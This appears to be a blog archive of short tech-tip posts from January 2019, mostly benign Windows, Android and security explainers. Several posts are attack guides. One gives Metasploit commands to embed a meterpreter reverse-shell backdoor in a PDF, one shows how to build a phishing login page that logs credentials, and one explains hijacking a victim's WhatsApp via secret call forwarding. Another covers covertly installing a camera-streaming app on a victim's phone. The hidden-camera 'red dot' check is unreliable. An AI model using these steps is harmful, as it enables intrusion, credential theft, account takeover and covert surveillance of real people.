Posts

Showing posts from January, 2019

πŸ€„️ How to Lock Specific Apps in Windows 10 πŸ€„️

Image
πŸ€„️ How to Lock Specific Apps in Windows 10 πŸ€„️ ➖➖➖➖➖➖➖➖➖➖➖➖ πŸ’  The method is quite easy and you will have to use a simple third-party tool that will help you to lock any of particular apps in windows with the password security. So follow the complete steps below to proceed. πŸŒ€ Steps To Lock Specific Apps in Windows 10: 1⃣ First of all, in your Windows 10 PC, download and install the app My Lockbox software the tool that will lock your apps. 2⃣ After installing this app, launch the app in your OS and then the tool will ask you to set up a password and that will be for locking the apps you want. And also you need to enter the hint and the email address for recovering the password. 3⃣ Now click on the browse option and there you need to select the folder where the app is installed which you want to lock and windows OS the apps are installed in the location C:\Program Files (x86) there select the folder of the apps that you want to lock, 4⃣ Now the app will get locked and w...

πŸ€„️ How to find your IP address on your smartphone πŸ€„️

Image
πŸ€„️ How to find your IP address on your Android smartphone πŸ€„️ ➖➖➖➖➖➖➖➖➖➖➖➖ 1⃣ To see your IP address on any Android smartphone you don’t have to visit any third party websites. 2⃣ To do so, first, you have to open the Settings of your Android phone. 3⃣ Then simply find and open System or Phone Information option (option name depends on the brands). 4⃣ Now after that simply select the About Phone option. 5⃣ After the above step now simply tap on the Status option simply to know the status of the connection and IP address. πŸ’  That’s it now you are done. πŸŒ€ How to find your IP address on your iPhone ✅ Now we are going to guide you to find out your IP address in iOS or iPhone. However, apart from all these things let me clarify one thing that finding your IP address on your iPhone or iOS is quite similar to the process that we perform in Android. Hence, this second guide is quite easy to understand if you already followed the above Android guide. 1⃣ First of all in iO...

The information codes

The information codes πŸ‘‰πŸΎ*#*#4636#*#*: This code displays the general information on your Samsung mobile (battery/Phoneu/WiFi...). πŸ‘‰πŸΎ*#34971539#: This code displays the camera information for your Samsung. πŸ‘‰πŸΎ*#2663#: Code to display information on your Samsung touch screen. πŸ‘‰πŸΎ*#1234#: Code to know the Firmware version of your Samsung. πŸ‘‰πŸΎ*#44336#: Code for the "bis" Firmware. πŸ‘‰πŸΎ*#06#: Code to know the IMEI number of the Samsung. πŸ‘‰πŸΎ*#232337#: Code to know the MAC address of Samsung Bluetooth. πŸ‘‰πŸΎ*#232338#: Code to know the WLAN MAC address of the Samsung. πŸ‘‰πŸΎ*#*#8255#*#*: Code to display the Samsung GTalk Service. πŸ‘‰πŸΎ*#7465625#: Code to check the network blocking or SIMLOCK from Samsung. Test codes * #0 * # =: Code to perform the various tests on the LCD, Samsung speakers.... * # * #2664 # * # *: Code to perform a Samsung touch screen test. * #0283 #: Code to perform Samsung microphone/speaker loops. * #0588 #: Code for the Samsu...

Make your own digital clock

Image
πŸ”°Make your own digital clock πŸ”° /* Task Description: Modify the code, create your own fancy digital clock! */ function start() {     var today = new Date();     var h = today.getHours();     var m = today.getMinutes();     var s = today.getSeconds();     m = correctTime(m);     s = correctTime(s);     document.getElementById('clock').innerHTML = h + ":" + m + ":" + s;     var t = setTimeout(start, 1000); } // Adding the zero if needed function correctTime(i) {     if (i < 10) {         i = "0" + i;     }     return i; }

πŸ”°What is a firewall?πŸ”°

Image
πŸ”°What is a firewall?πŸ”° A firewall is an essential piece of security software that monitors all incoming and outgoing traffic going through your network, checking for hackers, malware, unauthorized outgoing information, or anything that might put you or your PC at risk. Firewalls are often the first line of defense when protecting your data. πŸ”°Why use a firewall?πŸ”° Hackers can use Trojan viruses and keylogging software to access your computer and steal your personal data such as your history, passwords, and banking details by recording your sessions and keeping track of your keystrokes. They can also harness the power of your computer to run illicit activities without your knowledge (yes, your PC can be a part of the problem – strange, but true). πŸ”°What does a firewall do?πŸ”° Cyber criminals can use any internet connection or Wi-Fi network as an entry point into your computer. Firewalls block all unauthorized connections to your computer (including those of hackers who ar...

😎CLASSIFICATION OF HACKERS😎

Image
😎CLASSIFICATION OF HACKERS😎 Based  on the attitude and skill level they possess, hackers are classified into the following types: White Hat Hacker : A white hat hacker (also known  as ethical hacker) is  someone who uses his skills only  for defensive purposes such as penetration testing. These type of hackers are often  hired by many organizations in order to ensure the security of their information systems. Black Hat Hacker :  A black hat hacker (also known as cracker) is  someone  who always uses his skills for offensive purposes. The intention of black hat hackers is  to gain money or take personal revenge by causing damage  to information systems. Grey Hat Hacker:  A grey hat hacker is someone who falls in between the white hat and black hat category. This type of hacker may use his skills both for defensive and offensive purposes. Script Kiddie: A script kiddie is  a wannabe hackerπŸ˜…. These  ar...

Steps To Install And Use Dumpster For The First Time

Steps To Install And Use Dumpster For The First Time πŸ”΅ Step 1. First of all, download and install Dumpster app from Play store. πŸ”΅ Step 2. Now when you open the app, there will be long agreement displayed, either waste your lots of time to read those or simply click on agree and proceed. Using Dumpster πŸ”΅ Step 3. Now in the next step, select the media which you want to store in the app which gets deleted from your storage. Using Dumpster πŸ”΅ Step 4. Now this app is ready to store all the data that is being deleted in your Android device. Using Dumpster ❗️Note that if your Android is rooted that you can give superuser access to this app for better working of this app.

πŸ”₯How to Embed a backdoor in a PDF file❓

Image
πŸ”₯How to Embed a backdoor in a PDF file❓ Step 1)Run Metasploit Step2) Find the Appropriate Exploit. I will search metasploits database for an exploit for adobe pdf on windows, using this command: ●Code:msf > search type:exploit platform:windows adobe pdf You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: ●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Step 3) Set the Payload I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp Step 4) Set the exploit options First, display the required options for the exploit: ●Code:msf > exploit (adobe_pdf_embedded_exe) > show options You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample...

Directory Traversal

Image
Directory Traversal Directory Traversal refers to the attack in which an authenticated or unauthenticated user can request and view or execute files which reside outside the root directory of a web application,or outside a directory in which they should be restricted to.This results in an attacker being able to read any file which the user running the webserver (commonlywww-data)has access to.If a server has misconfigured file permissions (verycommon),then this attack can be further escalated.

How to Set a Shutdown Timer On Windows

🎁 How to Set a Shutdown Timer On Windows ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ This method will generate a shortcut on your desktop and time of shutdown will be set by you and when you click on it the countdown will automatically start and your Pc will get shut down after a specific time. The method will be effective when you are downloading something that takes excess time and in that case, you can set a timer for a shutdown. Just follow up the below steps to proceed. πŸ”΅ Steps To set a shutdown timer on Windows 1⃣ First of all, click on start and type notepad and press enter. Now notepad will open, just copy the below code and paste it into your notepad. shutdown -s -t 60 2⃣ In the above code 60 represent the time period in seconds after which PC will shutdown, you can change this also as specifying 60 will shutdown computer after 60 seconds that is 1 minute and if you want to shutdown it after 2 hours then you will write  shutdown -s -t 7200. 3⃣ Now save this file in desktop as Techviral ...

πŸ”° How to Clone Any Website Using HTTrack πŸ”°

πŸ”° How to Clone Any Website Using HTTrack πŸ”° ⚠️Download & Install HTTrack Install HTTrack by typing the following in a terminal. sudo apt-get install httrack When you downloaded and installed HTTrack, it placed it in the /usr/bin directory, so it should be accessible from any directory in Kali as /usr/bin is in the PATH variable. Lets type on the command line     httrack --help Then httrack < he URL of the site> [any options] URL Filter -O < location to send copy to> πŸ‘† points it at the website we want to copy and then direct the output (-O) to a directory on our hard drive where we want to store the website. E.g httrack http://www.software.com -O /tmp/webscantest Now that we have captured and copied the entire site to our hard drive, let's take a look at it. We can open the IceWeasel browser (or any browser) and view the contents of our copied site to the location on our hard drive. Since we copied the web site to /tmp/webscantest , we ...

KEYBOARD SHORTCUTS⌨️

Image
πŸ“ HOW TO MAKE SYMBOLS WITH KEYBOARD.πŸ“ Alt + 0153..... ™... trademark symbol Alt + 0169.... ©.... copyright symbol Alt + 0174..... ®....registeredtrademark symbol Alt + 0176 ...°......degree symbol Alt + 0177 ...±....plus-or-minus sign Alt + 0182 ...¶.....paragraph mark Alt + 0190 ...¾....fraction, three-fourths Alt + 0215 ....×.....multiplication sign Alt + 0162...¢....thecent sign Alt + 0161.....¡......upside down exclamation point Alt + 0191.....¿.....upside down question mark Alt + 1...........smiley face Alt + 2 ......☻.....black smiley face Alt + 15.....☼.....sun Alt + 12......♀.....female sign Alt + 11.....♂......male sign Alt + 6.......♠.....spade Alt + 5.......♣......Club Alt + 3............. Heart Alt + 4.......♦......Diamond Alt + 13......♪.....eighth note Alt + 14......♫......beamed eighth note Alt + 8721.... ∑.... N-ary summation (auto sum) Alt + 251.....√.....square root check mark Alt + 8236.....∞.....infinity Alt + 24.......↑.....up ...

πŸ”°EU Offering Cash Bounty Incentives For Finding Security Flaws in Open Source ToolsπŸ”°

πŸ”°EU Offering Cash Bounty Incentives For Finding Security Flaws in Open Source ToolsπŸ”° The European Union (EU) is back with a third edition of its Free and Open Source Software Audit (FOSSA) plan of action for 2019. As a security audit measure, FOSSA relies on its bug bounty programme. This covers numerous open source projects like VLC, Apache, Filezilla, Kafka and more. EU has reserved the highest allocation towards PuTTY, followed by Drupal and KeePass. A Snapshot FOSSA aims at bringing together the developer community to ensure better security of open source systems, such as CMS or other standard software used by the EU. There are several open-source software that is widely used by the authorities, as well as the public at large. Reportedly some of these are used as part of the EU’s IT Infrastructure, and therefore they are keen on ensuring better security for such projects.

🎁 How To Remove Computer Viruses Using CMD

🎁 How To Remove Computer Viruses Using CMD ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ Actually, the command prompt is a utility program that has an access to reconstruct all the system files, and in this method, we will be using the same access of cmd. This method works on attributes removing which can be one reason of virus. As the most probable reason for the virus to come into your computer is through USB device. So this method works perfectly on USB to remove its viruses and secure your computer. πŸ”΅ Steps To Remove Computer Viruses Using Command Prompt: 1⃣ First of all, click on Start and type cmd. Now right click on the cmd icon and select run as administrator. Now command prompt window will open, now select your drive from which you want to remove a virus. 2⃣ Let it be drive F. Now you have to select Drive F in CMD, for that you need to type “F:” without quotation on CMD . 3⃣ Now in the very next step, you need to type “dir F:” in CMD and Hit enter. It will show you the directory of F drive. 4...

Basic of internet

 In this section we will talk about information security, ethical hacking. This is just an introduction with some of the basic basic concepts. ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ πŸ”₯ MAC Address: (Media Acces Control) A unique 48-bit code that is assigned by the manufacturers of their network cards. This physical code is written to the EEPROM memory of the card and is used for the first authentication phase to a local network by a network device (router, switch, repeter, etc.) which then assigns a local IP address. πŸ”₯ Note: The importance of not leaving a trace of a MAC address lies in the fact that this information is memorized inside the network devices, which do not always allow to delete the logs. This address will also be sent to the ISP (Internet Service Provider) which will store it in its own databases. πŸ”₯ Hostname: The hostname is the name that we can assign to a device, with which it will be recognized within a network. πŸ”₯️ IP address: Unique series of numbers that identifies...

How to Move Emails from One Gmail Account to Another

How to Move Emails from One Gmail Account to Another The method is just simple and straight and you will use some of Gmail account settings that will allow you to transfer all the email to another account. And this is a feature of Gmail that probably no one of you was knowing before reading this guide. So follow up some simple steps below.  Steps To Enable POP In Old Email Account To Import Mails To New Account:  1. First of all login into your Gmail account whose email you want to move to another account.  2. Now click on settings button there on below of your profile picture of your account.1  3. Now under settings click on Forwarding and POP/IMAP option and there enable Enable POP for all mail (even mail that’s already been downloaded).  4. At below select Mark Gmail Copy As Read in the drop down option and then simply click on save changes option.  5. Now visit your new Gmail account to which you want to get all your mails.  6. T...

Best Programming Languages For Backend Web Development

Best Programming Languages For Backend Web Development Normally, users are more likely to notice what’s served before their eyes and not take note of what goes behind the scenes. Backend web development involves the part of coding which is not seen by the user. 1. PHP PHP starts the list on basis of its popularity and widespread use. Almost all active web users have come across some sort of implementation of PHP code, considering about 75% of websites use PHP. PHP has come a long way since its creation way back in 1994. 2. Python Gone are the days when Python was restricted to desktop programming. Now, in the realm of backend web development, python is rising among the ranks. Most server-side programmers nowadays have adopted Python as a substitute for PHP 3. Java Just like Python, Java has risen to be a multipurpose language. It’s used for desktop software development, android development and most importantly, for web development. As much as one may love the newer tec...

HOW TO RECOVER DELETED MESSAGES ON ANDROID

HOW TO RECOVER DELETED MESSAGES ON ANDROID Step 1. First of all in your windows PC download and install the tool Android Data Recovery. Step 2. Now you have to enable USB debugging in your android for that you have to go to Settings -> About Phone -> Build Number and tap on it 7-10 times. Now you will see developer option in your settings and tap on it and scroll down and enable USB Debugging Step 3. Now launch the tool that you installed in your PC and from there select your android version and proceed by connecting your android to your PC via USB cable. Now select the messages at the recovery section and then simply click on next. Step 4. Now the Android Data Recovery software will ask you to Allow/Grant/ Authorize the access in order to get the privilege to scan SMS data. simply allow it Step 5. Now after the scan gets completed you will see all the deleted text messages from the android device, click on the items you want to restore and then click on “Recover” butt...

πŸ”°How To Make your Own fake PageπŸ”°

Image
πŸ”°How To Make your Own scam PageπŸ”° 1. Open Up the Site that You Want to Make The Fake Page From it, After The Load Right Click and Save Rhe Page as "Web Page Complete" 2. Now open that page with notepad, and press control+F to access search bar, and then search "login" (I recommend using NotePad++) 3. Behind the word "login" it's written .action, we don't need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx) 4. If You Saw Method="Post" Change it to Method="GET"    5. Ok Now Save it as .Html 6. Open a New Notepad, and Write This Commands 7. Instead of Location: Target.com, Write Your Login Page Address! 8. Now Save this as Login.PHP 9. Go to Website's That offer Free Hosts 10. Upload Website And Done Ⓜ️ Note : Look at PHP source, you can see log.txt that's where your victim info's saved.

✌️YOUTUBE TRICKS FOR YOU✌️

Image
✌️YOUTUBE TRICKS FOR YOU✌️ Are you fond of downloading music and videos but you have problems in downloading it..Here is tricks in youtube. 1.How to download only audios of a music or video simply go to the address bar and replace "youtube" with "listentoyoutube" and paste it in your address bar to download the audio of the video. 2.To download youtube videos in any quality like mp3,mp4,3gpsimply replace "youtube" with "ssyoutube" in your browser URL and paste it in your address bar of your browser. 3.Tried of age restictions when downloading video in youtube just replace "youtube" with "nsfwyoutube" in the URL and paste it in your address bar. 4.To remove advert from your youtube.Replace "youtube" with "youtubeskip" in the url and paste it in the address bar. 5.To convert the video to graphical interweave format(gif)in youtube just replace"youtube" with "gifyoutube". ...

⛩Increase Virtual RAM - To Make Your System Faster

⛩Increase Virtual RAM - To Make Your System Faster Follow the steps given below :- 1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard. Another way is Right-Clicking 'My Computer' and then Select 'Properties'. 2) Click on the 'Advanced' tab. 3) Under 'Performance', click 'Settings'. 4) Then click the 'Advanced' tab on the button that pops up. 5) Under 'Virtual Memory' at the bottom, click 'Change'. 6) Click the 'Custom Size' button. 7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000). 8) Click 'Set', and then exit out of all of the windows. 9) Finally, Restart your computer. 10) You now have a faster computer and 1-2GB of Virtual RAM..!

What is Emotet?♦️

Image
♦️What is Emotet?♦️ Emotet is a Trojan that is primarily spread through spam emails (malspam). The infection may arrive either via malicious script, macro-enabled document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click the malicious files by using tempting language about “Your Invoice,” “Payment Details,” or possibly an upcoming shipment from well-known parcel companies

πŸ”°πŸ”°What is adware?πŸ”°πŸ”°

Image
πŸ”°πŸ”°What is adware?πŸ”°πŸ”° Adware is unwanted software designed to throw advertisements up on your screen, most often within a web browser. Some security professionals view it as the forerunner of the modern-day PUP (potentially unwanted program). Typically, it uses an underhanded method to either disguise itself as legitimate, or piggyback on another program to trick you into installing it on your PC, tablet, or mobile device.

Top Android hacking application

Top Android hacking application 1. SpoofApp :- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3. Faceniff :- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4. Nmapper :- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish it...

How To Get .Com Domain Name In Cheapest Rate

πŸ”° How To Get .Com Domain Name In Cheapest Rate πŸ”° 1. First You Need A Good VPN 2. Connect The VPN to United States 3. Clear Cache Of Your Browser / Chrome @globalkosreborn 4. Open Godaddy United States Site 5. Choose Your Domain as .COM 6. Pay €0.99 Not Free But Cheapest 7. That's How You Get Your Domain.

How to Install a Complete Linux Distro on Android

Image
♦️How to Install a Complete Linux Distro on Android♦️ For users who want to experience a complete desktop OS on their Android phone, especially tech-savvy people who don’t want to carry around a laptop or tablet, it’s entirely possible to install a fully-functional Linux OS on your Android phone. You will need a rooted phone for this operation – you can search Appuals for a root guide for your device if you aren’t already rooted. Once you’re rooted though, the process is fairly simple. Requirements BusyBox VNC Viewer Linux Deploy πŸ”ΊThe first thing you’ll want to do is install BusyBox – either directly from Google Play store, or the Magisk BusyBox module if you’re rooted with MagiskSU. If you install BusyBox from the Google Play store, you just need to download the app, launch it, and hit the “Install” button from inside the app.  πŸ”ΊIf you’re rooted with MagiskSU, you need to launch Magisk Manager and go to Settings, then enable the “Enable Busybox” button, which wi...

How To Unroot Your Android Using SuperSU

Image
πŸ”° How To Unroot Your Android Using SuperSU πŸ”° ✔️ Launch The SuperSU App . .. ✔️ Tap The "Settings" Tab. ✔️ Scroll Down To The "Cleanup" Section. ✔️ Tap "Full Unroot". ✔️ Read The Confirmation Prompt And Then Tap "Continue". ✔️ Reboot Your Device Once SuperSU Closes. ⚠ Use An Unroot App If This Method Fails.

πŸŒ€Code Injection/Execution OR code injection attack

Image
πŸŒ€Code Injection/ExecutionπŸŒ€ In this vulnerability an attacker maliciously takes advantage of a script which contains system functions/calls,to read or execute files on a remote server.This is synonymous to having a backdoor shell.Needless to say that under certain circumstances privilege escalation is possible. Inthis example a script is using the exec()function to execute the ping command.However,the host is dynamic as it is being passed via an HTTP GET request:

πŸŒ€ SMURF ATTACK πŸŒ€

Image
πŸŒ€ SMURF ATTACK πŸŒ€ A smurf attack is a type of denial of service attack in which a system is flooded with spoofed ping messages.This creates high computer network traffic on the victim’s network,which often renders it unresponsive. Smurfingtakes certain well-known facts about Internet Protocol and Internet Control Message Protocol (ICMP)into account.ICMP is used by network administrators to exchange information about network state,and can also be used to ping other nodes to determine their operational status.The smurf program sends a spoofed network packet that contains an ICMP ping.The resulting echo responses to the ping message are directed toward the victim’s IP address.Large number of pings and the resulting echoes can make the network unusable for real traffic

What is SWIFT code

Image
♦️ What is SWIFT Code?♦️ SWIFT Code (Society for Worldwide Interbank Financial Telecommunication) or BIC (Bank Identifier Code) is a unique identification code for a particular bank. These codes are used when transferring money between banks, particularly for international wire transfers. The Swift code consists of 8 or 11 characters. SWIFT Code Format : AAAA-BB-00-YYY First 4 characters - bank code (only letters) Next 2 characters -country code (only letters) Next 2 characters - location code (letters and digits) Last 3 characters - branch code (optional).

πŸ˜‚HOW TO HACK WHATSAPP WITH COMMON SENSEπŸ˜‚

Image
πŸ˜‚HOW TO HACK WHATSAPP WITH COMMON SENSEπŸ˜‚ πŸ”°This is a very interesting way to hack WhatsApp.  Just dial this number from the  victim's phone, and then you can hack WhatsApp account. πŸ”°Ok from your victim mobile number dial this number *21*yourmobilenumber#. It will forward calls to your mobile number. Make sure your victim is not using his/her phone. Tip: Do it when your victim is sleeping I mean at midnight. πŸ”°Open WhatsApp in your phone(whatsapp data must be flashed) enter victim mobile number Wait for 30 seconds and then click on call me You will get called on your mobile number because you forward call in the first step. πŸ”°Listen to WhatsApp code carefully enter the code. You hacked victim's WhatsApp successfully.  But you can do more. Apply step 2 verification so the victim does not get his WhatsApp account easily.    ——— tech ——— πŸ”°To stop call forwarding dial #21#

πŸ“ŒHOW TO DETECT A HIDDEN CAMERA IN A ROOM.πŸ“Œ

Image
πŸ“ŒHOW TO DETECT A HIDDEN CAMERA IN A ROOM.πŸ“Œ When you stay in a hotel, how do you know there is no room secret pinhole camera? When you travel to an unfamiliar destination or take a business trip, you stay at a hotel, but what you do not know is that you could unknowingly be photographed or be secretly recorded. In this age of smart recording devices and pinhole sized drones, always remember when staying in a hotel, that you can use this method to check your room : πŸ“Œ 1.When you have entered into  your room, turn off the lights, and close the curtains,open your phone camera, do not turn the flash light on. πŸ“Œ 2.Turn around the room with your cell phone. When a red dot is found on your screen, that means that a hidden web camera is installed. πŸ”΄If no red dots, then the room is okay. Please forward this message to your friends who travel a lot. And those that make a lot of business trips. And those that may be sleep nude. My dear friends and sisters kindly n...

πŸŒ€ IP SPOOFING πŸŒ€

Image
πŸŒ€πŸŒ€ IP SPOOFING πŸŒ€πŸŒ€               IP spoofing refers to connection hijacking through a fake Internet Protocol (IP)address.IP spoofing is the action of masking a computer IP address so that it looks like it is authentic. During this masking process,the fake IP address sends what appears to be a malevolent message coupled with an IP address that appears to be authentic and trusted.In IP spoofing,IP headers are masked through a form of Transmission Control Protocol (TCP)in which spoofers discover and then manipulate vital information contained in the IP header such as IP address and source and destination information.

πŸŒ€“WhatsApp Gold” Virus ReturnsπŸŒ€

Image
πŸŒ€“WhatsApp Gold” Virus ReturnsπŸŒ€ 2016 saw the beginning of the “WhatsApp Gold” virus.Users were tricked into downloading a virus under the guise of an upgrade. After a couple of years dying down it has returned.Many users have receiving messages with warnings concerning the WhatsApp Gold virus.Accompanying the warning is a rumor about a fictitious martinelli video which will allegedly hack your phone and leave it in an irreparable state. WhatsAppGold claimed to have advanced features such as video chatting,deleting messages after being sent and also sending up to a hundred images at a time.Enticed users had followed the link to get the so-called “upgrade” which led to a malware-riddled site.Once upon a time,many had fallen for the scam. ⚠️ don't download whatsaWh gold⚠️

SPYWARE

Image
♦️SPYWARE♦️ Spyware Spyware is a form of malware that hides on your device, monitors your activity, and steals sensitive information like bank details and passwords. Spyware can infect your system in the same ways that any other malware does, by means of a Trojan, a virus, worm, exploit, and other types of malware. 

How To Protect Your Google Chrome Browser With Password

Image
 How To Protect Your Google Chrome Browser With Password ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ The method is very simple and easy as it works with a simple chrome extension and by this, you can make your browser password protected, with any of password you want to set. By this, you can guarantee your privacy and share your PC with anyone else too. Because you will have some sight of relief as your browser is already protected and no one except you will be able to access it. So just follow up the below steps to protect your Google Chrome browser with the password.  Steps To Protect Google Chrome Browser With Password 1⃣ First of all download and install the latest version of Google Chrome Browser on your computer. 2⃣ Now there you will find the extension named Set password for your browser, click on Add to chrome button and then simply on add. Now it will check for the Google Chrome’s version and will be prepared to install in you...

How To Hijack Your Friends Browser Using Chrome Extension

&#127873; How To Hijack Your Friends Browser Using Chrome Extension ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ The method is quite simple and depends on a cool chrome extension that you will get from google chrome market and that will allow you to connect to your friend’s browser and open any web page that you want to open in his/her browser. So you just need to follow some simple steps below to proceed. ❗️Note:- This trick will only work if the both your and your’s friends will have this extension in Google Chrome. &#128309; Steps To Forcibly open tabs in your Friend’s Browsers: 1⃣ First of all, you need to download and install a cool extension on  your google  chrome browser that is Shove. 2⃣ Now click on shove extension and there you have to create an account first to access its services. 3⃣ Now proceed with the instructed and ...

How to Enable Developer Mode on Chrome OS to Get Root Access

&#127873; How to Enable Developer Mode on Chrome OS to Get Root Access ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ The method is quite simple and easy and you need to follow the simple and easy guide that will provide your Chrome OS the root access and this will enable the developer mode and give you all the controls to access the OS services. So follow the steps below to proceed. ⚜ Things to Keep in Mind Before Proceeding ⚜ Chromebook will get reset ⚜ When you go for rooting process then you need to factory reset your device to flush out all the current directory files. And this will gonna revert back all the settings to the default factory settings. You can either backup all your important files or can store the files to the cloud services. ⚜ Google will stop supporting your Chromebook ⚜ If the developer mode gets enables then the google will Stop supporting your device. And all the ...

How To Automatically Back Up Your Photos And Videos With Google Plus

🎁 How To Automatically Back Up Your  Photos And Videos With Google Plus ➖➖➖➖➖➖➖➖➖➖➖➖ ✅ All you need for implementing this trick is a google+ accountand a Google Photos app in your Android smartphone, The trick consists of a simple law it will automatically backup your photos and videos with Google plus. When you download Google+ app in your android smartphone it also gives you an app named “Photos” You are going to be benefitted by this. πŸ”΅ Steps to follow 1⃣ Sign in with your Google account in your Android smartphone and if you haven’t signed up with google+ then don’t waste time sign up as soon as possible. 2⃣ Download Google+ app in your Android Smartphone, Every latest phone now are coming up with all the google features inbuilt. So you don’t even need to download any app look at your app list maybe it is hiding somewhere. 3⃣ Open Photos Application it will first ask you to connect with your Gmail account if you haven’t connected yet. 4⃣ If you already connected y...

CHAT WITH FRIENDS USING MS-DOS

CHAT WITH FRIENDS USING MS-DOS 1. All you need is your friends IP address and your command Prompt. 2. Open your notepad and write this code as it is- @echo off: A Cls echo MESSENGER set/p n= User: Set/pm= Message: net send %n% %m% Pause Goto A3. 3. Now save this as "Messenger.Bat". 4. Drag this file (.bat file) over to Command Prompt and press enter! 5. You would then see something like this: MESSENGER USER: 6. After "User" type the IP address of the computer you want to contact. 7. Before you press "Enter" it should look like this: MESSENGER User: IP_Address User: IP_Address Message: Hi, How are you ? Message: Hi, How are you ? 8. Now all you need to do is press " Enter", and start chatting

How To Stay Anonymous On The Internet

🎴 How To Stay Anonymous On The Internet ➰ Part 1 - How do you get caught ? Your PC will send a request to websites you visit asking the website to return a page to you. Your IP address is contained within that request. All IP addresses across the globe are assigned to organisations by region registries. In other words, if you are using a Virgin Cable internet connection, your IP is associated to Virgin Cable. Therefore, if you commit something illegal on a website, the website and the authorities will know to contact Virgin Cable to request information pertaining to you. ➰ Part 2 - How do you not get caught ? Simple! In 2 ways.. ➖1. By accessing the website from a different IP address. ➖2. By making it as tricky as possible to pin the action on you. There are multiple ways to access a website from a different IP. We have VPNs, HTTP Proxies, Socks, RDPs and more. Each have their pro's and cons. None is perfect. For example, HideMyAss is one of the most popular VPN...

πŸ“How To Create Your Own Web Hosting Site For FREE!πŸ“

πŸ“How To Create Your Own Web Hosting Site For FREE!πŸ“ 1: Register Free Domain At: Freenom.com 2: Change Nameservers To: ns1.byet.org ns2.byet.org ns3.byet.org ns4.byet.org 3: Go To MyOwnFreeHost.Net Sign Up With The Domain & Email Adress. 4: You'll Receive An Email Under 5: Hrs With The Details Of cPanel Enjoy

HOW TO RUN .EXE FILE IN ANDROID 

πŸ”° HOW TO RUN .EXE FILE IN ANDROID πŸ”° ‼️Files with the EXE extension are executable files intended for use within Windows or MS-DOS. You can't make all EXE files work on an Android. However, many older DOS-based EXE files can be opened with the DOS emulator DOSBox. ⛔️ ➖➖➖➖➖➖➖➖➖➖➖➖ ♦️ Step 1 Install a DOSBox app on your Android device. AnDOSBox, aDosBox and DosBox Turbo are three different DOSBox apps available from the Google Play store. ♦️ Step 2 Open the DOSBox app . ♦️ Step 3 Type "cd \foldername" into the command line, where "foldername" denotes the folder in which your EXE is contained. For example, if your EXE is in the Download folder, type "cd \download." ♦️ Step 4 Click Enter on your Android keyboard. ♦️ Step 5 Enter the name of the EXE file. You do not need to enter the .exe extension. ♦️ Step 6 Tap "Enter" on your Android keyboard. ➖➖➖➖➖➖➖➖➖➖➖➖

HIDE COMPUTER DRIVES WITH CMD

HIDE COMPUTER DRIVES WITH CMD ❌➖➖➖➖➖➖➖➖➖➖❌ Π’ΠΎdΠ°Ρƒ i will write a  tutΠΎrΡ–Π°l tΠΎ Hide Drives with CMD wΡ–thout any thΡ–rd Ρ€Π°rtΡƒ расkΠ°gΠ΅. Π’hΠ΅rΠ΅ Π°rΠ΅Π° sΠ΅vΠ΅rΠ°l frΠ΅Π΅ Π°nd duΠ΅ sΠΎftwΠ°rΠ΅’s ассСssΡ–blΠ΅ tΠΎ hide local  drΡ–vΠ΅s, hΠΎwΠ΅vΠ΅r Ρ– Π°m nΠΎt gΠΎnnΠ° mΠ΅ntΡ–ΠΎn to hΡ–dΠ΅ Π° local drΡ–vΠ΅ Π΅mΡ€lΠΎΡƒΡ–ng Π° расkΠ°gΠ΅. In  thΡ–s tutΠΎrΡ–Π°l Ρ– wΡ–ll shΠΎw ΡƒΠΎu an Π΅Π°sΡ–Π΅st mΠ΅thΠΎd tΠΎ hide nΠ°tΡ–vΠ΅ drΡ–vΠ΅ with CMD. thΡ–s mΠ°Ρƒ sΠ°vΠ΅ ΡƒΠΎur Сасh саsh Π°nd tΡ–mΠ΅. ❌➖➖➖➖➖➖➖➖➖➖❌ Step 1:- Π‘lісk ΠΎn Start – Run , if you are Using Windows 8, Then Click on start and search for Run, or just hold down windows key and press  ” R “. Step 2:- Run bΠΎΡ… will appear, kΡ–ndly type ” сmd ” Π°nd hΡ–t Π•ntΠ΅r. Step 3. Now you will see Command promt windows, Type ” DΡ–skΡ€Π°rt ” Π°nd hΡ–t Π•ntΠ΅r. Note : In Windows 8 i was asked to confirm if i want to allow this program to make changes to this computer. Just click on yes and another Window will open up shortly. Step 4:- Now you have to type  ” lΡ–st vΠΎlumΠ΅ ” Π°nd Hit Enter to see the list of...

HOW TO HACK ANY PHONES CAMERA & ACCESS THEM WITH YOUR PHONE (NO ROOT) WORKING 100%

HOW TO HACK ANY PHONES CAMERA & ACCESS THEM WITH YOUR PHONE (NO ROOT) WORKING 100% 1.Download Ip Webcam from appstore or playstore 2.Force stop all Camera apps which is installed on your phone 3.When you are done Open  Ip Webcam and install all manage Scripts 4.Then turn on Access of all Scripts... 5.NOW CLICK ON START SERVER and wait a few seconds After  that you'll see at your notification bar a  IP:Port NOW COPY THE IP:PORT IN CHROME BROWSER U CAN ALL USE A PC NOW U CAN SEE FROM PHONE CAM ON PC OR OTHER PHONE NB: INSTALL THIS APP ON YOUR VICTIMS PHONE SHARE AND SUPPORT

